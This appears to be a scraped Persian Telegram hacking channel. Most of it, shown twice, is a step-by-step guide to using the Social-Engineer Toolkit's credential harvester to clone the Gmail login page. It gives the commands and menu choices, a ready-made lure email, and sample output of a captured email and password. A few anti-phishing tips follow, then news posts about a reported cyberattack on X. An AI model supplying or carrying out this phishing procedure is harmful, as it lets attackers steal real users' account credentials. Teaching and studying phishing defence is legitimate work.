پس از اجرای SET، منوی اصلی نمایش داده میشود. گزینههای مختلفی برای حملات وجود دارد. برای فیشینگ، گزینه ۱) Social-Engineering Attacks را انتخاب کنید.
۴. انتخاب روش فیشینگ:
در مرحله بعد، گزینههای مختلفی برای حملات فیشینگ نمایش داده میشود. برای ایجاد یک صفحه ورود جعلی، گزینه ۲) Website Attack Vectors را انتخاب کنید.
۵. انتخاب نوع حمله وبسایت:
حالا باید نوع حمله وبسایت را انتخاب کنید. برای ایجاد یک صفحه ورود جعلی، گزینه ۳) Credential Harvester Attack Method را انتخاب کنید.
۶. انتخاب روش ایجاد صفحه جعلی:
در این مرحله، SET از شما میپرسد که آیا میخواهید از یک قالب آماده استفاده کنید یا یک صفحه وب را کپی کنید. برای سادگی، گزینه ۲) Site Cloner را انتخاب کنید.
۷. وارد کردن آدرس وبسایت واقعی:
حالا باید آدرس وبسایت واقعی را وارد کنید که میخواهید از آن تقلید کنید. برای مثال، اگر میخواهید یک صفحه ورود جعلی برای Gmail ایجاد کنید، آدرس زیر را وارد کنید:
۸. راهاندازی سرور فیشینگ:
به طور خودکار صفحه ورود جعلی را ایجاد میکند و یک سرور محلی راهاندازی میکند. این سرور در آدرس IP شما (مثلاً 192.168.1.100) و پورت پیشفرض (مثلاً ۸۰) در دسترس خواهد بود.
۹. ارسال ایمیل فیشینگ:
حالا باید کاربران را به صفحه جعلی هدایت کنید. این کار معمولاً با ارسال یک ایمیل فیشینگ انجام میشود که حاوی لینک به صفحه جعلی است. متن ایمیل ممکن است شبیه به این باشد:
۱۰. جمعآوری اطلاعات:
وقتی کاربران روی لینک کلیک کنند و اطلاعات ورود خود را وارد کنند، این اطلاعات به سرور SET ارسال میشود و در ترمینال نمایش داده میشود:
نکات امنیتی برای جلوگیری از فیشینگ:
کاربران:
هرگز روی لینکهای ناشناس کلیک نکنید.
همیشه آدرس وبسایت را به دقت بررسی کنید.
از احراز هویت دو مرحلهای (2FA) استفاده کنید.
سازمانها:
آموزش کاربران درباره فیشینگ و تکنیکهای مهندسی اجتماعی.
استفاده از ابزارهای ضد فیشینگ و فیلتر کردن ایمیلهای مخرب.
نظارت مداوم بر ترافیک شبکه برای شناسایی فعالیتهای مشکوک.
اگر موافق هستید توی کامنت ها بگید روش های دیگه دسترسی به شبکه را هم توضیح بدیم .
ما را معرفی کنید ❤
@TryHackBox
یکی از ابزارهای قدرتمند و محبوب برای انجام حملات فیشینگ است. این ابزار به مهاجمان اجازه میدهد تا صفحات ورود جعلی ایجاد کنند، ایمیلهای فیشینگ ارسال کنند و حتی بدافزارها را توزیع کنند. در اینجا مراحل انجام یک حمله فیشینگ با استفاده از SET به طور کامل و با جزئیات توضیح داده شده است:
مراحل انجام فیشینگ با SET:
۱. نصب و راهاندازی SET:
معمولاً به صورت پیشفرض در توزیعهای لینوکس مانند Kali Linux نصب شده است. اگر نصب نیست، میتوانید آن را با دستور زیر نصب کنید:
sudo apt install setoolkit
پس از نصب، SET را با دستور زیر اجرا کنید:
setoolkit
۲. پیکربندی اولیه SET:
پس از اجرای SET، ممکن است از شما خواسته شود که برخی تنظیمات اولیه را انجام دهید. این تنظیمات شامل انتخاب نوع حمله، پیکربندی سرور و غیره است. برای شروع، معمولاً گزینههای پیشفرض کافی هستند.
۳. انتخاب نوع حمله:
پس از اجرای SET، منوی اصلی نمایش داده میشود. گزینههای مختلفی برای حملات وجود دارد. برای فیشینگ، گزینه ۱) Social-Engineering Attacks را انتخاب کنید.
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration 6) Help, Credits, and About set> 1۴. انتخاب روش فیشینگ:
در مرحله بعد، گزینههای مختلفی برای حملات فیشینگ نمایش داده میشود. برای ایجاد یک صفحه ورود جعلی، گزینه ۲) Website Attack Vectors را انتخاب کنید.
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors 10) Third Party Modules
set> 2۵. انتخاب نوع حمله وبسایت:
حالا باید نوع حمله وبسایت را انتخاب کنید. برای ایجاد یک صفحه ورود جعلی، گزینه ۳) Credential Harvester Attack Method را انتخاب کنید.
Select from the menu:
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
set> 3۶. انتخاب روش ایجاد صفحه جعلی:
در این مرحله، SET از شما میپرسد که آیا میخواهید از یک قالب آماده استفاده کنید یا یک صفحه وب را کپی کنید. برای سادگی، گزینه ۲) Site Cloner را انتخاب کنید.
Select from the menu:
1) Web Templates
2) Site Cloner
3) Custom Import
set> 2۷. وارد کردن آدرس وبسایت واقعی:
حالا باید آدرس وبسایت واقعی را وارد کنید که میخواهید از آن تقلید کنید. برای مثال، اگر میخواهید یک صفحه ورود جعلی برای Gmail ایجاد کنید، آدرس زیر را وارد کنید:
Enter the url to clone: https://www.gmail.com۸. راهاندازی سرور فیشینگ:
به طور خودکار صفحه ورود جعلی را ایجاد میکند و یک سرور محلی راهاندازی میکند. این سرور در آدرس IP شما (مثلاً 192.168.1.100) و پورت پیشفرض (مثلاً ۸۰) در دسترس خواهد بود.
[*] Cloning the website: https://www.gmail.com [*] This could take a little bit...
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed below:۹. ارسال ایمیل فیشینگ:
حالا باید کاربران را به صفحه جعلی هدایت کنید. این کار معمولاً با ارسال یک ایمیل فیشینگ انجام میشود که حاوی لینک به صفحه جعلی است. متن ایمیل ممکن است شبیه به این باشد:
موضوع: امنیت حساب کاربری شما متن: برای حفظ امنیت حساب کاربری خود، لطفاً روی لینک زیر کلیک کنید و وارد شوید: http://192.168.1.100
۱۰. جمعآوری اطلاعات:
وقتی کاربران روی لینک کلیک کنند و اطلاعات ورود خود را وارد کنند، این اطلاعات به سرور SET ارسال میشود و در ترمینال نمایش داده میشود:
[*] WE GOT A HIT! Email: user@example.com Password: password123نکات امنیتی برای جلوگیری از فیشینگ:
کاربران:
هرگز روی لینکهای ناشناس کلیک نکنید.
همیشه آدرس وبسایت را به دقت بررسی کنید.
از احراز هویت دو مرحلهای (2FA) استفاده کنید.
سازمانها:
آموزش کاربران درباره فیشینگ و تکنیکهای مهندسی اجتماعی.
استفاده از ابزارهای ضد فیشینگ و فیلتر کردن ایمیلهای مخرب.
نظارت مداوم بر ترافیک شبکه برای شناسایی فعالیتهای مشکوک.
اگر موافق هستید توی کامنت ها بگید روش های دیگه دسترسی به شبکه را هم توضیح بدیم .
ما را معرفی کنید ❤
@TryHackBox
❤6👍2
⭕ حمله سایبری بیسابقه به ایکس؛ ایلان ماسک از احتمال دخالت یک کشور متخاصم خبر داد!
🔻ایلان ماسک، مالک پلتفرم ایکس (X)، از وقوع یک حمله سایبری گسترده به این شبکه اجتماعی خبر داد و تأکید کرد که این حمله هنوز مهار نشده است.
🔴به گفته ماسک، اگرچه این پلتفرم روزانه با حملات متعددی رو به رو است، اما حمله امروز به حدی جدی و وسیع است که اختلالاتی جهانی در عملکرد ایکس ایجاد کرده است
🔻او احتمال داد که این حمله یا توسط یک گروه بزرگ و هماهنگ انجام شده یا پشت پرده آن، یک کشور متخاصم قرار دارد که از ابعاد این تهاجم سایبری حکایت میکند.
🔻ایلان ماسک، مالک پلتفرم ایکس (X)، از وقوع یک حمله سایبری گسترده به این شبکه اجتماعی خبر داد و تأکید کرد که این حمله هنوز مهار نشده است.
🔴به گفته ماسک، اگرچه این پلتفرم روزانه با حملات متعددی رو به رو است، اما حمله امروز به حدی جدی و وسیع است که اختلالاتی جهانی در عملکرد ایکس ایجاد کرده است
🔻او احتمال داد که این حمله یا توسط یک گروه بزرگ و هماهنگ انجام شده یا پشت پرده آن، یک کشور متخاصم قرار دارد که از ابعاد این تهاجم سایبری حکایت میکند.
👍9
𝕏
دوباره از کار افتاد - ایلان ماسک "حمله سایبری گسترده" را تایید کرد زیرا سایت سابق توییتر امروز برای چهارمین بار از کار افتاد.
https://www.techradar.com/news/live/x-is-down-latest-news-on-twitters-third-outage
دوباره از کار افتاد - ایلان ماسک "حمله سایبری گسترده" را تایید کرد زیرا سایت سابق توییتر امروز برای چهارمین بار از کار افتاد.
https://www.techradar.com/news/live/x-is-down-latest-news-on-twitters-third-outage
TechRadar
X is back – here's what we know about the 'massive cyberattack' that caused Twitter to go down multiple times
X went down multiple times yesterday – here's everything we know about the biggest Twitter outage for years.
🤔1